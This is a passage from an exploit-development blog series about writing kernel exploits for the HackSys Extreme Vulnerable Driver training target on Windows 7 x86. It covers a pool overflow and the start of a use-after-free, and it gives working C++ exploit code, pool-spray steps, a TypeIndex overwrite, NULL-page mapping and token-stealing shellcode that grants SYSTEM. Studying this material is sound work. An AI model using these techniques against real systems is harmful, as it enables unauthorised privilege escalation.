    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during sequential.\n";
            exit(1);
        }

        sequential_handles.push_back(result);
    }
    
    cout << "[>] Sequential spray complete.\n";
}

void send_payload(HANDLE hFile) {
    
    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    spray_pool();

    send_payload(hFile);

    return 0;
}

Take note that we’re storing the handles to each Event Object in a vector so that we can access those later.

Let’s spray our objects and then allocate our kernel buffer and see what the page looks like that our kernel buffer ends up being allocated on. We still have the same breakpoint from before, right after the memcpy operation. At this point the kernel buffer pointer is still in eax don’t forget, so I just want to subtract 0x1000 from it because thats a small page size and then advance by just plugging that right in to the !pool command we get the whole page’s allocation information:

kd> !pool 8628b008-0x1000
Pool page 8628a008 region is Nonpaged pool
*8628a000 size:   40 previous size:    0  (Allocated) *Even (Protected)
		Pooltag Even : Event objects
 8628a040 size:   80 previous size:   40  (Free)       b.2.
 8628a0c0 size:   40 previous size:   80  (Allocated)  Even (Protected)
 8628a100 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a140 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a180 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a1c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a200 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a240 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a280 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a2c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a3c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a4c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a500 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a540 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a580 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a5c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a640 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a680 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a6c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a700 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a740 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a780 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a7c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a800 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a840 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a8c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a940 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a9c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aa80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aac0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ab80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628abc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ac80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628acc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ad80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628adc0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628ae80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628aec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628af80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628afc0 size:   40 previous size:   40  (Allocated)  Even (Protected)

That looks pretty nice. We get a nice contiguous block of Event Objects just as we expected (bit weird that there’s a 0x80 byte hole in there…).

The next thing we need to do, is examine the constituent parts of these Event Objects to find our overwrite target. I like to take a look at the memory pane of and then, following along with the cited blogposts, parse out the meaning of the byte values. Here is the memory view for one of the Event Object allocations:

8628afc0 08 00 08 04 45 76 65 ee 00 00 00 00 40 00 00 00  ....Eve.....@...
8628afd0 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00  ................
8628afe0 00 00 00 00 0c 00 08 00 40 f9 37 86 00 00 00 00  [email protected].....
8628aff0 01 00 04 34 00 00 00 00 f8 af 28 86 f8 af 28 86

We can start parsing this by taking a look at the pool header:

kd> dt nt!_POOL_HEADER 8628afc0 
   +0x000 PreviousSize     : 0y000001000 (0x8)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y000001000 (0x8)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4080008
   +0x004 PoolTag          : 0xee657645
   +0x004 AllocatorBackTraceIndex : 0x7645
   +0x006 PoolTagHash      : 0xee65

This looks pretty familiar to what we’ve done, obviously the PoolTag is different, but so is the Ulong1 value and you can examine the binary constituent parts that lead to its formulation. Next we’ll look at the OBJECT_HEADER_QUOTA_INFO which starts at offset 0x8 from the beginning of our allocation and you can match it up with the bytes in the memory view:

kd> dt nt!_OBJECT_HEADER_QUOTA_INFO 8628afc0+0x8
   +0x000 PagedPoolCharge  : 0
   +0x004 NonPagedPoolCharge : 0x40
   +0x008 SecurityDescriptorCharge : 0
   +0x00c SecurityDescriptorQuotaBlock : (null) 

So far, none of these things can be changed by our overwrite. Our overwrite has to keep all of this data intact so we’ll have to write these values into our input buffer. Next, we’ll finally start to approach our overwrite target when we parse out the OBJECT_HEADER:

kd> dt nt!_OBJECT_HEADER 8628afc0 + 8 + 10
   +0x000 PointerCount     : 0n1
   +0x004 HandleCount      : 0n1
   +0x004 NextToFree       : 0x00000001 Void
   +0x008 Lock             : _EX_PUSH_LOCK
   +0x00c TypeIndex        : 0xc ''
   +0x00d TraceFlags       : 0 ''
   +0x00e InfoMask         : 0x8 ''
   +0x00f Flags            : 0 ''
   +0x010 ObjectCreateInfo : 0x8637f940 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : 0x8637f940 Void
   +0x014 SecurityDescriptor : (null) 
   +0x018 Body             : _QUAD

This is where things start to get interesting as the TypeIndex value right now is set to 0xc. 0xc is actually an array index value, like array[0xc]. This array, is called the ObTypeIndexTable and it is filled with pointers which define OBJECT_TYPEs. This is actually really cool in my opinion because we can test this out. Let’s first dump all the pointers stored in the ObTypeIndexTable.

kd> dd nt!ObTypeIndexTable
82997760  00000000 bad0b0b0 84f46728 84f46660
82997770  84f46598 84fedf48 84fede08 84fedd40
82997780  84fedc78 84fedbb0 84fedae8 84fed410
82997790  85053520 8504f9c8 8504f900 8504f838
829977a0  8503f9c8 8503f900 8503f838 84ffb9c8
829977b0  84ffb900 84ffb838 84fef780 84fef6b8
829977c0  84fef5f0 8503b838 8503b770 8503b6a8
829977d0  85057590 850573a0 84ff3ca0 84ff3bd8

If the first entry, 82997760, is array index 0, then 0xc index is going to be 85053520. Let’s get WinDBG to spill the beans on this type and let’s see if its indeed an Event Object.

kd> dt nt!_OBJECT_TYPE 85053520 -b
   +0x000 TypeList         : _LIST_ENTRY [ 0x85053520 - 0x85053520 ]
      +0x000 Flink            : 0x85053520 
      +0x004 Blink            : 0x85053520 
   +0x008 Name             : _UNICODE_STRING "Event"
      +0x000 Length           : 0xa
      +0x002 MaximumLength    : 0xc
      +0x004 Buffer           : 0x8ba06838  "Event"
   +0x010 DefaultObject    : (null) 
   +0x014 Index            : 0xc ''
   +0x018 TotalNumberOfObjects : 0x6bbf
   +0x01c TotalNumberOfHandles : 0x6c2b
   +0x020 HighWaterNumberOfObjects : 0x6bbf
   +0x024 HighWaterNumberOfHandles : 0x6c2b
   +0x028 TypeInfo         : _OBJECT_TYPE_INITIALIZER
      +0x000 Length           : 0x50
      +0x002 ObjectTypeFlags  : 0 ''
      +0x002 CaseInsensitive  : 0y0
      +0x002 UnnamedObjectsOnly : 0y0
      +0x002 UseDefaultObject : 0y0
      +0x002 SecurityRequired : 0y0
      +0x002 MaintainHandleCount : 0y0
      +0x002 MaintainTypeList : 0y0
      +0x002 SupportsObjectCallbacks : 0y0
      +0x002 CacheAligned     : 0y0
      +0x004 ObjectTypeCode   : 2
      +0x008 InvalidAttributes : 0x100
      +0x00c GenericMapping   : _GENERIC_MAPPING
         +0x000 GenericRead      : 0x20001
         +0x004 GenericWrite     : 0x20002
         +0x008 GenericExecute   : 0x120000
         +0x00c GenericAll       : 0x1f0003
      +0x01c ValidAccessMask  : 0x1f0003
      +0x020 RetainAccess     : 0
      +0x024 PoolType         : 0 ( NonPagedPool )
      +0x028 DefaultPagedPoolCharge : 0
      +0x02c DefaultNonPagedPoolCharge : 0x40
      +0x030 DumpProcedure    : (null) 
      +0x034 OpenProcedure    : (null) 
      +0x038 CloseProcedure   : (null) 
      +0x03c DeleteProcedure  : (null) 
      +0x040 ParseProcedure   : (null) 
      +0x044 SecurityProcedure : 0x82abad90 
      +0x048 QueryNameProcedure : (null) 
      +0x04c OkayToCloseProcedure : (null) 
   +0x078 TypeLock         : _EX_PUSH_LOCK
      +0x000 Locked           : 0y0
      +0x000 Waiting          : 0y0
      +0x000 Waking           : 0y0
      +0x000 MultipleShared   : 0y0
      +0x000 Shared           : 0y0000000000000000000000000000 (0)
      +0x000 Value            : 0
      +0x000 Ptr              : (null) 
   +0x07c Key              : 0x6e657645
   +0x080 CallbackList     : _LIST_ENTRY [ 0x850535a0 - 0x850535a0 ]
      +0x000 Flink            : 0x850535a0 
      +0x004 Blink            : 0x850535a0 

Using -b option here really saves us because it displays all levels of sub-structures within their parent structures. So, we absolutely have honed in on the pointer to Event objects as evidenced by this:

+0x008 Name             : _UNICODE_STRING "Event"

What gets cool here, is that at offset 0x28 we see the TypeInfo structure. One of it’s members, the CloseProcedure is 0x38 deep into that TypeInfo structure. So starting from offset 0x0 of the data referenced by the OBJECT_TYPE pointer we found in the table, the CloseProcedure is located at offset 0x28 + 0x38, or 0x60. THIS is the function pointer that is called when use CloseHandle API to free these Event Objects from the non-paged pool. So this is our target.

If that is complicated I’ve tried to create a helpful diagram:

So what happens when we free the chunk with CloseHandle is the kernel goes to the address referenced by the array index value 0xc and looks at offset 0x60 from there for a function pointer and calls the function. Looking back at that table:

kd> dd nt!ObTypeIndexTable
82997760  00000000 bad0b0b0 84f46728 84f46660
----SNIP----

The first function pointer is 0x00000000 and we already know from our NULL pointer dereference exploit that we can map the NULL page on Windows 7 x86. So thanks to the aforementioned bloggers, our path forward is clear. We’ll ONLY corrupt the value 0xc inside the OBJECT_HEADER so that it’s set to 0x0 instead. We’ll leave everything else the way it is with our overwrite. This way, when we free this chunk, the kernel will start looking for offset 0x60 for a function pointer from 0x00000000. So we’ll just map the NULL page and place a pointer to our shellcode at offset 0x60.

Executing The Plan

Now that we know our plan of attack, we need to execute it.

The adjustment we need to make is to poke holes in this contiguous block so that when we get our buffer allocated the allocator slides it right between Event Objects. We know that it takes 8 Event Objects being freed to make a 0x200-sized hole, so following along with @FuzzySec, we’ll release 8 Event Object handles every 0x16 handles in our vector. Our code now looks like this:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

vector<HANDLE> defragment_handles;
vector<HANDLE> sequential_handles;

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void spray_pool() {

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during defragmentation\n";
            exit(1);
        }

        defragment_handles.push_back(result);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during sequential.\n";
            exit(1);
        }

        sequential_handles.push_back(result);
    }
    
    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x200 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i = i + 0x16) {
        for (int x = 0; x < 8; x++) {
            BOOL freed = CloseHandle(sequential_handles[i + x]);
            if (freed == false) {
                cout << "[!] Unable to free sequential allocation!\n";
                cout << "[!] Last error: " << GetLastError() << "\n";
            }
        }
    }
    cout << "[>] Holes poked lol.\n";
}

void send_payload(HANDLE hFile) {
    
    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    spray_pool();

    send_payload(hFile);

    return 0;
}

After running it and looking up our post memcpy kernel buffer with the !pool command, we see that our 0x200 byte object was allocated precisely between two Event Objects! Everything is working as planned!

kd> !pool 862740c8
Pool page 862740c8 region is Nonpaged pool
 86274000 size:   40 previous size:    0  (Allocated)  Even (Protected)
 86274040 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274080 size:   40 previous size:   40  (Allocated)  Even (Protected)
*862740c0 size:  200 previous size:   40  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 862742c0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862743c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862744c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274500 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274540 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274580 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862745c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274640 size:  200 previous size:   40  (Free)       Even
 86274840 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274880 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862748c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274900 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274940 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274980 size:   40 previous size:   40  (Allocated)  Even (Protected)
 862749c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274a80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274ac0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274b80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274bc0 size:  200 previous size:   40  (Free)       Even
 86274dc0 size:   40 previous size:  200  (Allocated)  Even (Protected)
 86274e00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274e40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274e80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274ec0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f00 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f40 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274f80 size:   40 previous size:   40  (Allocated)  Even (Protected)
 86274fc0 size:   40 previous size:   40  (Allocated)  Even (Protected)

Memory Corruption Engaged

Now that we can control the pool to a predictable degree, it’s time to overwrite that type index and change it from 0xc to 0x0. Everything else in between our 0x200 allocation and this byte need to remain the same or we’ll get a BSOD.

Let’s just use the dd command to dump 32 DWORD values from the beginning of the Event Objects right after our kernel buffer real quick. repaste in here the memory pane view of an Event Object, and you can see how I formulate the input buff in the exploit code.

kd> dd 8627e780 
8627e780  04080040 ee657645 00000000 00000040
8627e790  00000000 00000000 00000001 00000001
8627e7a0  00000000 0008000c 8637f940 00000000
----SNIP----

Right. So we need to keep everything but the starred 0xc intact and overwrite this single byte with 0x0. Looks like we’re overwriting 40 bytes in total or 0x28, which gives us an input buffer size of 0x220. We’ll make an overwrite_payload variable that is a byte buffer and well copy it into the last 0x28 bytes of a 0x220 sized buffer with our original \x42 values taking up the first 0x1F8 bytes as follows:

 ULONG payload_len = 0x220;

    BYTE* input_buff = (BYTE*)VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    BYTE overwrite_payload[] = (
        "\x40\x00\x08\x04"  // pool header
        "\x45\x76\x65\xee"  // pool tag
        "\x00\x00\x00\x00"  // obj header quota begin
        "\x40\x00\x00\x00"
        "\x00\x00\x00\x00"
        "\x00\x00\x00\x00"  // obj header quota end
        "\x01\x00\x00\x00"  // obj header begin
        "\x01\x00\x00\x00"
        "\x00\x00\x00\x00"
        "\x00\x00\x08\x00" // 0xc converted to 0x0
        );

    memset(input_buff, '\x42', 0x1F8);
    memcpy(input_buff + 0x1F8, overwrite_payload, 0x28)

We’ll also want to allocate the NULL page which I pulled directly from tekwizzz123.

void allocate_shellcode() {

    _NtAllocateVirtualMemory NtAllocateVirtualMemory = 
        (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtAllocateVirtualMemory");

    INT64 address = 0x1;
    int size = 0x100;

    HANDLE result = (HANDLE)NtAllocateVirtualMemory(
        GetCurrentProcess(),
        (PVOID*)&address,
        NULL,
        (PSIZE_T)&size,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (result == INVALID_HANDLE_VALUE) {
        cout << "[!] Unable to allocate NULL page...wtf?\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] NULL page mapped.\n";
    cout << "[>] Putting 'AAAA' on NULL page...\n";

    memset((void*)0x0, '\x41', 0x100);

}

I’ll also fill the NULL page with pure \x41 values so that we should run this code and get an Access Violation exception with an eip value of 41414141.

Last but not least, we have to free our chunks so that the CloseProcedure is activated!

void free_chunks() {

    cout << "[>] Freeing defragmentation allocations...\n";
    for (int i = 0; i < defragment_handles.size(); i++) {

        BOOL freed = CloseHandle(defragment_handles[i]);
        if (freed == false) {
            cout << "[!] Unable to free defragment allocation!\n";
            cout << "[!] Last error: " << GetLastError() << "\n";
            exit(1);
        }
    }
    cout << "[>] Defragmentation allocations freed.\n";
    cout << "[>] Freeing sequential allocations...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {

        BOOL freed = CloseHandle(sequential_handles[i]);
        if (freed == false) {
            cout << "[!] Unable to free defragment allocation!\n";
            cout << "[!] Last error: " << GetLastError() << "\n";
            exit(1);
        }
    }
    cout << "[>] Sequential allocations freed.\n";
}

We run this code and what happens??

Access violation - code c0000005 (!!! second chance !!!)
41414141 ??              ???

We did it!!

You can examine the pool allocations too. Look at pool allocation right after our kernel buffer. We’ve replaced 0xc with 0x0 and you can see how it differs from the next Event Object as I’ve marked them with asteriks.

855b8af8 42 42 42 42 42 42 42 42 40 00 08 04 45 76 65 ee  [email protected].
855b8b08 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00  ....@...........
855b8b18 01 00 00 00 01 00 00 00 00 00 00 00 *00* 00 08 00  ................
855b8b28 80 82 14 85 00 00 00 00 01 00 04 00 00 00 00 00  ................
855b8b38 38 8b 5b 85 38 8b 5b 85 08 00 08 04 45 76 65 ee  8.[.8.[.....Eve.
855b8b48 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00  ....@...........
855b8b58 01 00 00 00 01 00 00 00 00 00 00 00 *0c* 00 08 00  ................

Now let’s just allocate some shellcode there…

Shellcode Implementation

We’re going to first use our shellcode from our Uninit Stack Variable exploit and see how far that gets us:

char Shellcode[] = (
		"\x60"
		"\x64\xA1\x24\x01\x00\x00"
		"\x8B\x40\x50"
		"\x89\xC1"
		"\x8B\x98\xF8\x00\x00\x00"
		"\xBA\x04\x00\x00\x00"
		"\x8B\x80\xB8\x00\x00\x00"
		"\x2D\xB8\x00\x00\x00"
		"\x39\x90\xB4\x00\x00\x00"
		"\x75\xED"
		"\x8B\x90\xF8\x00\x00\x00"
		"\x89\x91\xF8\x00\x00\x00"
		"\x61"
		"\xC3"
		);

These are my breakpoints right now:

kd> bp !HEVD+4D64
kd> ba r1 0x60
kd> bl
 0 e 8c295d64     0001 (0001) HEVD!TriggerNonPagedPoolOverflow+0xe6
 1 e 00000060 r 1 0001 (0001) 

Here is the disassembly pane after we hit our access breakpoint a few times (remember that that address will be accessed multiple times during our exploit). You can see we’re calling a function located at edi + 0x60 when edi is set to 0. So, this is our shellcode we’re about to run:

Here is the call stack:

We can see in the memory pane that we’re pushing 4 DWORDs onto the stack setting up our call to dword ptr [esp+0x60] which we would need to clean up in our subroutine (shellcode). So our shellcode will end with a ret 0x10 instruction to compensate.

Getting an nt authority/system shell »>

Full exploit code: here

Conclusion

That was a really fun one. Thanks again to the aforementioned authors and exploit writers. Even though this exploit vector involved some relatively old techniques, it was still fun for me and I learned a lot just about memory management in general and got some more experience in WinDBG. Until next time!

HEVD Exploits – Windows 7 x86 Use-After-Free

By: h0mbre
23 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

UAF Setup

I’ve never exploited a use-after-free bug on any system before. I vaguely understood the concept before starting this excercise. We need what, in my noob opinion, seems like quite a lot of primitives in order to make this work. Obviously HEVD goes out of its way to be vulnerable in precisely the correct way for us to get an exploit working which is perfect for me since I have no experience with this bug class and we’re just here to learn. I feel like although we have to utilize multiple functions via IOCTL, this is actually a more simple exploit to pull off than the pool overflow that we just did.

Also, I wanted to do this on 64 bit; however, most of the strategies I saw outlined required that we use NtQuerySystemInformation, which as far as I know requires your process to be elevated to an extent so I wanted to avoid that. On 64 bit, the pool header structure size changes from 0x8 bytes to 0x10 bytes which makes exploitation more cumbersome; however, there are some good walkthroughs out there about how to accomplish this. For now, let’s stick to x86.

What do we need in order to exploit a use-after-free bug? Well, it seems like after doing this excercise we need to be able to do the following:

  • allocate an object in the non-paged pool,
  • a mechansim that creates a reference to the object as a global variable, ie if our object is allocated at 0xFFFFFFFF, there is some variable out there in the program that is storing that address for later use,
  • the ability to free the memory and not have the previously established reference NULLed out, ie when the chunk is freed the program author doesn’t specify that the reference=NULL,
  • the ability to create “fake” objects that have the same size and controllable contents in the non-paged pool,
  • the ability to spray the non-paged pool and create perfectly sized holes so that our UAF and fake objects can be fitted in our created holes,
  • finally, the ability to use the no-longer valid reference to our freed chunk.

Allocating the UAF Object in the Pool

Let’s take a look at the UAF object allocation routine in the driver in IDA.

It may not be immediately clear what’s going on without stepping through the routine in the debugger but we actually have very little control over what is taking place here. I’ve created a small skeleton exploit code and set a breakpoint towards the start of the routine. Here is our code at the moment:

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);
}


int main() {

    HANDLE hFile = grab_handle();

    create_UAF_object(hFile);

    return 0;
}

You can see from the IDA screenshot that after the call to ExAllocatePoolWithTag, eax is placed in esi, this is about where I’ve placed the breakpoint, we can then take the value in esi which should be a pointer to our allocation, and go see what the allocation will look like after the subsequent memset operation completes. We can see some static values as well, such as waht appears to be the size of the allocation (0x58), which we know from our last post is actually undersold by 0x8 since we have to account also for the pool header, so our real allocation size in the pool is 0x60 bytes.

So we hit our breakpoint after ExAllocatePoolWithTag and then I just stepped through until the memset completed.

Right after the memset completed, we look up our object in the pool and see that it’s mostly been filled with A characters except for the first DWORD value has been left NULL. After stepping through the next two instructions:

We can see that the DWORD value has been filled and also that a null terminator has been added to the last byte of our allocation. This DWORD is the UaFObjectCallback which is a function pointer for a callback which gets used during a separate routine.

And lastly in the screenshot we can see that move esi, which is the location of our allocation, into the global variable g_UseAfterFreeObject. This is important because this is what makes this code vulnerable as this same variable will not be nulled out when the object is freed.

Freeing the UAF Object

Now, lets try interacting with the driver routine which allows us to free our object.

Not a whole lot here, we can see though that there is no effort made to NULL the global variable g_UserAfterFreeObject. You can see that even after we run the routine, the vairable still holds the value of our freed allocation address:

Allocating a Fake Object

Now let’s see how much freedom we have to allocate arbitrary objects in the non-paged pool. Looking at the function, it uses the same APIs we’re familiar with, does a probe for read to make sure the buffer is in user land (I think?), and then builds our chunk to our specifications.

I just sent a buffer of size 0x58 with all A characters for testing. It even appends a null-terminator to the end like the real UAF object allocator, but we control the contents of this one. This is good since we’ll have full control over the pointer value at prepended to the chunk that serves as the call back function pointer.

Executing UAF Object Callback

This is where the “use” portion of “Use-After-Free” comes in. There is a driver routine that allows us to take the address which holds the callback function pointer of the UAF object and then call the function there. We can see this in IDA.

